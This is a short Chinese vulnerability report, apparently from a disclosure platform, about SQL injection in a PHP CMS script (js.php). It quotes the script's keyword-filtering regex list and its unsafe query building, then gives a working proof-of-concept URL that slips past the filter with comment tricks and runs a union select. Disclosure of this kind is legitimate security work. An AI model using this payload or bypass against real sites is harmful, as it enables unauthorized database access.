2012-07-11：积极联系厂商并且等待厂商认领中，细节不对外公开；2012-08-25：厂商已经主动忽略漏洞，细节向公众公开
SQL 注入
$pattern_arr = $replace_arr = array();if(!defined('IN_ADMIN')) { $pattern_arr = array( "/ union /i", "/\/\*\s?\*\/union\/\*\s?\*\//i", "/ select /i", "/\/\*\s?\*\/select\/\*\s?\*\//i", "/ update /i", "/\/\*\s?\*\/update\/\*\s?\*\//i", "/ from /i","/\/\*\s?\*\/from\/\*\s?\*\//i", "/ or /i","/\/\*\s?\*\/or\/\*\s?\*\//i", "/ and /i","/\/\*\s?\*\/and\/\*\s?\*\//i", "/ outfile /i", "/\(\s?select\s+/i", ); $replace_arr = array( ' union ', '/∗∗/union/∗∗/', ' select ', '/∗∗/select/∗∗/', ' update ', '/∗∗/update/∗∗/', ' from ', '/∗∗/from/∗∗/', ' outfile ', ' or ', '/∗∗/or/∗∗/', ' and ', '/∗∗/and/∗∗/', '* from ', '(select ', ); $_POST = strip_sql($_POST); $_GET = strip_sql($_GET); $_COOKIE = strip_sql($_COOKIE); unset($pattern_arr, $replace_arr);}define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());if(!MAGIC_QUOTES_GPC) { $_POST = add_slashes($_POST); //调用addslashes 转义 $_GET = add_slashes($_GET); $_COOKIE = add_slashes($_COOKIE); $_FILES && $_FILES = add_slashes($_FILES);}if(!empty($_POST)) extract($_POST, EXTR_SKIP); if(!empty($_GET)) extract($_GET, EXTR_SKIP);$sort = $jssort=='shop' ? (isset($sort) && $sort > 0 && $sort <= 3 ? $sort : 0) : (isset($sort) && $sort > 0 && $sort <= 3 ? $sort : 0); $num = isset($num) && intval(trim($num)) >= 1 ? intval(trim($num)) : 10; $intercept = isset($intercept) && $intercept > 0 ? intval($intercept) : 0; $openwindow = isset($openwindow) && $openwindow > 0 ? 1 : 0; $pcdname = isset($pcdname) && $pcdname > 0 ? 1 : 0; if(!$sort) { exit("document.write(\"未选择显示类型。\");"); } $cachename = 'js_'.md5($jssort.$panels.$sort.$num); $cachefile = MUDDER_CACHEDIR.'cache_'.$cachename.'.php'; $where = ''; if((@!include($cachefile)) || $timestamp - $_createtime_js > $cachelife) { $panels = $panels ? explode('_', $panels) : ''; if($panels && is_array($panels)) foreach($panels as $panel) { $where .= ($where ? " OR " : " ")."classcode like '{$panel}__'"; }
注入有木有?
http://localhost/sa/js.php?jssort=shop&sort=1&num=2&panels=_sb_fack_a'+and/**/1=2/**/union select+1,user(),3,4,5%23
过滤
未能联系到厂商或者厂商积极拒绝